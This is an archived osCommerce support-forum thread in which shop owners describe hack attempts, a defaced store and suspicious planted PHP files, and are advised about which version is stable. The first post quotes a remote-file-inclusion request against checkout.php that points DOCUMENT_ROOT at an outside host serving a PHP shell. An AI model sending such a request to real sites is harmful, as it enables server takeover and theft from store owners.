Jump to content
Latest News: (loading..)

Archived

This topic is now archived and is closed to further replies.

tgely

Hack attempts

Recommended Posts

Some days before...

 

 

V3 on Hack attempt was barren of results

http:\\thisismyshop.hu\checkout.php\?_SERVER[DOCUMENT_ROOT]=http:\\www.apc.edu.ec\temp?

 

The http:\\www.apc.edu.ec\temp? file includes PHP/Shell virus!!!!!! ATTENTION! DONT OPEN THIS LINK!

 

Panda security reports:

PHP/Shell virus infection, file deleted.

 

 

My Error logs:

  • PHP Notice: Array to string conversion in osc3/includes/functions/html_output.php on line 488
  • PHP Notice: Array to string conversion in osc3/includes/functions/general.php on line 51

I found some info about this in this ebook but osCommerce V3 better than 2003 checkouts.

 

I used visitor web stats behind.


:blink:

Share this post


Link to post
Share on other sites

Toth,

 

I am sure you have read this before, but let me type it again......v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

 

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Toth,

 

I am sure you have read this before, but let me type it again......v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

 

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

 

Chris

 

Chris,

 

 

Yes, I know.

v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

 

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

 

But RC without some security options more dangerous.


:blink:

Share this post


Link to post
Share on other sites

Chris,

 

 

Yes, I know.

v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

 

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

 

But RC without some security options more dangerous.

 

My case was on the RC2, i just found the stores's index page changed to an arab message, and titled "hacked by some Doctor Whatever"

 

What I did, was to clear the entire estore/db structure and went to the backup.

 

However, theese days i foud 3 suspect files named m.html, s.html, and another one askim???.php wich had some postcard sending feature, and an emo child criyng on the top.

Here's one of the first files stored in pastebin:

 

http://pastebin.com/PHAWmMLA

 

Someone on my hosting service, told us it was just an xploid and the risk was low, but they didn't see this files. i just found out,

 

Thanks in advance,

 

Juanfer

Share this post


Link to post
Share on other sites

We've been haacked, a few months ago for sure.

We restored backups and then i found in my store's root 3 files: s.php x.html and mailer.php (for now thoose are the weird ones)

 

i pasted the code for the 3 fils here:

http://pastebin.com/wm7eLavM

 

Am currently downloading and will try to do a VER CLEAN installation of the newest 2,3,1 version, but will require some advice to avoid hacking attempts that often

 

our store is located under http://pilarholguin.com.co/tienda

Share this post


Link to post
Share on other sites

Juan,

 

Your template is not functional. You are losing the OSCID when you click the main product image and the other PHP links do not work either (page not found)

 

It also appears you are trying to update your site to version 2.3.1 and failed to complete the process.

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

×